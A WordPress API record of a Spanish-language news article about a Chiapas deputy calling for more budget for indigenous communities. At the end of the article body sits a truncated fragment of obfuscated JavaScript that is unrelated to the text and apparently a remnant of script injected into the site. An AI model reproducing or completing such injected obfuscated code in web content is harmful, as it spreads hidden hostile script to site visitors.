{"id":19526,"date":"2024-12-30T04:55:38","date_gmt":"2024-12-30T04:55:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19526"},"modified":"2024-12-30T04:55:39","modified_gmt":"2024-12-30T04:55:39","slug":"debe-haber-mas-presupuesto-para-las-comunidades-indigenas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19526","title":{"rendered":"Debe haber m\u00e1s presupuesto para las comunidades ind\u00edgenas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"447\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735534475701.jpg\" alt=\"\" class=\"wp-image-19527\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735534475701.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735534475701-300x186.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>29 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; El diputado local Domingo Vel\u00e1zquez M\u00e9ndez, hizo un llamado para que se incremente el presupuesto que se destinar\u00e1 a los pueblos originarios, asegurando que el aporte de las Culturas ind\u00edgenas muchas veces no es valorado en la entidad.<\/p>\n\n\n\n<p>Esto en la antesala del an\u00e1lisis y aprobaci\u00f3n de la Ley de Ingresos de Chiapas.<\/p>\n\n\n\n<p>En este contexto dijo que: &#8220;Como presidente de la Comisi\u00f3n de Pueblos y Comunidades Ind\u00edgenas, y Afromexicanos con la finalidad de solicitar recurso del 2025 que en unos d\u00edas vamos a aprobar como legisladores, es por eso que exhorto que la Comisi\u00f3n de Hacienda del Congreso del Estado considere un aumento de recursos para los pueblos y comunidades ind\u00edgenas&#8221;.<\/p>\n\n\n\n<p>Solicit\u00f3 a trav\u00e9s de un escrito enviado a Manuel Pariente Gavito, un incremento a la propuesta del paquete fiscal 2025, que se enfocar\u00e1 en beneficio de las zonas m\u00e1s marginadas de Chiapas.<\/p>\n\n\n\n<p>Precis\u00f3 que, con el Fondo para la Aportaci\u00f3n de las zonas ind\u00edgenas se garantizan servicios de agua potable, drenaje, tratamiento de aguas, salud y el Fondo para la Atenci\u00f3n de la Seguridad P\u00fablica, Promoci\u00f3n de Desarrollo Integral, Justicia Social entre otros aspectos.<\/p>\n\n\n\n<p>Indic\u00f3 que: &#8220;Cumpliendo el reclamo hist\u00f3rico en ejercicio pleno de sus derechos, se ha construido con los pueblos y comunidades ind\u00edgenas una relaci\u00f3n de franco respeto y se promueven desde el gobierno federal con visiones de justicia social, reparaciones hist\u00f3ricas&#8221;.<\/p>\n\n\n\n<p>Pero adem\u00e1s dijo que estas asignaciones deber\u00edan de administrarse por los propios pueblos originarios.<\/p>\n\n\n\n<p>&#8220;La pobreza afecta a los pueblos ind\u00edgenas de Chiapas en distintos aspectos, como la falta de acceso a servicios b\u00e1sicos, la discriminaci\u00f3n y la marginaci\u00f3n social.<br>Con darse un incremento a favor de los pueblos originarios y se distribuyan los recursos necesarios, se hace justicia social a los pueblos originarios&#8221;, expres\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 29 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; El diputado local Domingo Vel\u00e1zquez M\u00e9ndez, hizo un llamado para que se incremente el presupuesto que se destinar\u00e1 a los pueblos originarios, asegurando que el aporte de las Culturas ind\u00edgenas muchas veces no es valorado en la entidad. Esto en la antesala del an\u00e1lisis y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19527,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19526","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19526"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19526\/revisions"}],"predecessor-version":[{"id":19528,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19526\/revisions\/19528"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19527"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19526"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}